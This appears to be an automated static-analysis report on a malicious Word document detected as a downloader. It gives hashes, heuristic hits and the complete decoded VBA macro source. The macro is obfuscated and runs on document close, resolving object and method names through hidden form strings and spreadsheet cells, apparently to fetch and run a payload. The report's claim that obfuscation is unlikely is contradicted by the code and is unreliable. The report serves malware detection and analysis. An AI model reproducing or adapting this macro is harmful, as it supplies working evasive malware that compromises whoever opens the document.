Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5513f446c70d99f1…

MALICIOUS

Office (OOXML)

83.8 KB Created: 2021-01-29 10:19:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: c392ce1bc528b47fb7ad67e23f8ca291 SHA-1: d48475181c9336cbb0a9932f7de63c8fd32a4f2e SHA-256: 5513f446c70d99f1ed2089d69b899d20b05152777f392a655eed2a7373a19eda
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set axn = CreateObject(UserForm1.g8 & UserForm1.pq)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set oi = CallByName(axn.Workbooks, UserForm1.mp & UserForm1.le, 1, UserForm2.ComboBox1, , , , UserForm1.rr)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6984 bytes
SHA-256: 654c2b28716acc7bb98699d239f348c5dece11c160be9d884fa7bf7e1f3901fd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public g, jv, bv, j0, pm, axn, qy, m1r, jb, fn, zs, jw, o2, p7, gq, ip

Sub Document_Close()

qe = UserForm2.ComboBox12

k6

End Sub

Sub k6()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set axn = CreateObject(UserForm1.g8 & UserForm1.pq)

axn.DisplayAlerts = False

vq = 1301

vkq = 0

Err.Number = 0

While vq <> 0 And vkq < 32

Set oi = CallByName(axn.Workbooks, UserForm1.mp & UserForm1.le, 1, UserForm2.ComboBox1, , , , UserForm1.rr)

vq = Err.Number

vkq = vkq + 16

Wend

If vq <> 0 Then

ErrHandler:

lo = UserForm2.ComboBox28

mdr = CallByName(Application, UserForm1.o0 & UserForm1.dq, 2)

e2 = UserForm2.ComboBox14

If mdr <> False Then

ojk = UserForm2.ComboBox19

Set jg = CreateObject(UserForm1.bd4 & UserForm1.jf4)

CallByName jg.Documents, UserForm1.mp & UserForm1.le, 1, ActiveDocument.FullName, , True

qn = UserForm2.ComboBox21

CallByName jg, UserForm1.qs9 & UserForm1.f5, 1, Now + TimeSerial(0, 0, 2), UserForm1.hq & UserForm1.bi & "k6"

Else

CallByName Application, UserForm1.qs9 & UserForm1.f5, 1, Now + TimeSerial(0, 0, 17), UserForm1.hq & UserForm1.bi & "k6"

End If

axn.Quit

Exit Sub

End If

ri = UserForm2.ComboBox16

Dim ec

kl3 = UserForm2.ComboBox11

Set ec = axn.sheets(1)

oc = "'"

ip = axn.sheets(5).Cells(1, 1)

If Len(ip) < 1 Then

If axn.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

Exit Sub

End If

End If

mm = ec.Cells(75, 12).Value

d4 = axn.sheets(1).Cells(7, 14).Value

fn = axn.sheets(1).Cells(6, 39).Value

zs = axn.sheets(2).Cells(142, 2).Value

pm = axn.sheets(2).Cells(80, 49).Value

d7 = axn.sheets(2).Cells(24, 42).Value

i1 = ec.Cells(143, 33).Value

iq = axn.sheets(3).Cells(98, 20).Value

w = axn.sheets(2).Cells(142, 10).Value

hu = axn.sheets(1).Cells(138, 35).Value

o2 = axn.sheets(2).Cells(107, 38).Value

qy = axn.sheets(1).Cells(124, 7).Value

l7 = UserForm2.ComboBox13

jb = axn.sheets(3).Cells(22, 50).Value

oj = axn.sheets(3).Cells(55, 36).Value

dx = axn.sheets(2).Cells(147, 10).Value

jw = axn.sheets(1).Cells(55, 56).Value

dw = axn.sheets(1).Cells(53, 40).Value

xoc = axn.sheets(2).Cells(71, 36).Value

g = axn.sheets(3).Cells(27, 18).Value

jm = axn.sheets(3).Cells(42, 52).Value

rd = axn.sheets(1).Cells(65, 24).Value

m1r = axn.sheets(3).Cells(22, 31).Value

jv = axn.sheets(3).Cells(138, 35).Value

kq = axn.sheets(3).Cells(99, 42).Value

zo = axn.sheets(2).Cells(54, 8).Value

gq = ""

Set Sh1 = axn.sheets(4)

qq = UserForm2.ComboBox8

po = 1

ux = UserForm2.ComboBox16

l1 = True

While l1

kz = Sh1.Cells(po, 1).Value

If Len(kz) < 1 Then

l1 = False

Else

gq = gq & kz

End If

po = po + 1

Wend

ex = CallByName(axn, hu, 2)

bu = UserForm2.ComboBox26

UserForm1.c2.Value = i1 & ex & xoc

UserForm1.aw.Value = d4

ed = UserForm2.ComboBox3

CallByName CreateObject(zo), rd, 1, UserForm1.c2, dw, UserForm1.aw

Set qiq = CreateObject(mm)

Set m8 = CallByName(qiq, d7, 2)

Set bb6 = CallByName(m8, kq, 1)

Set jb = CallByName(qiq, jb, 2)

Set j0 = qiq

qb = UserForm2.ComboBox14

UserForm5.ComboBox1 = "rb"

Set g = CallByName(p7, g, 2)

m1r = CallByName(g, m1r, 2)

UserForm1.rn.Value = jm & iq

UserForm3.ComboBox1 = w

UserForm1.rn.Value = oj

fy = UserForm2.ComboBox28

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = m1r

qiq = bg

g9 = UserForm2.ComboBox23

oi = m3

ec = q9

m8 = ydt

bb6 = zx

jb = bsb

fn = iy

ia = UserForm2.ComboBox27

zs = i

p7 = i7

g = b

no = UserForm2.ComboBox16

j0 = hz

DoEvents

CallByName axn, dx, 1

axn = tx

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{FB8A4366-3BAF-40F1-8B9D-4B4B9427AE79}{52D85C0F-E4F3-4720-8DBD-50BB88A77865}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{484B5FBA-1BDC-47F0-9157-6080BE221AC8}{B1BEEB4F-5DE6-44D7-BD59-66903896B8BC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 p6 = UserForm2.Controls.Count - 1

mr = UserForm2.ComboBox3

 
 
 
 

 rs = ""
 For l5 = 1 To p6 Step 2
 rs = rs & UserForm2.Controls.Item(l5)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"

vj = UserForm2.ComboBox23

 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem rs
 ComboBox1.AddItem "gz"

ch = UserForm2.ComboBox6

 
 

gle = UserForm2.ComboBox13

 
 
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{B4F4C947-037E-45C7-9747-3D7C3FC46B2F}{296C43D5-4F05-48B4-9666-4AA5EAE0A8BB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.g, ActiveDocument.qy, VbMethod, 1, ActiveDocument.m1r
 CallByName ActiveDocument.g, ActiveDocument.jv, VbMethod, UserForm1.rn.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{9FD6C449-74FE-4C5C-AE85-B2919C80B9F1}{637DD3D2-D345-453B-BA86-7DD13026211E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()

e4 = UserForm2.ComboBox3

 CallByName ActiveDocument.j0, ActiveDocument.pm, VbMethod, UserForm1.rn.Value, ActiveDocument.gq, ActiveDocument.ip
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{460C4ECD-7417-4DD1-9B6B-0E21F987A5F6}{8AB77A1A-0AF8-4236-8300-C55106B7617A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.fn = CallByName(ActiveDocument.jb, ActiveDocument.fn, VbGet)
 Set ActiveDocument.zs = CallByName(ActiveDocument.fn, ActiveDocument.zs, VbGet)
 Set ActiveDocument.p7 = CallByName(ActiveDocument.zs, ActiveDocument.jw, VbMethod, ActiveDocument.o2)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 51200 bytes
SHA-256: 45e0bfab7f550b1ce7cda2ae5ee8ad244e63e46429c5c0691530d6e91b201ed7
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely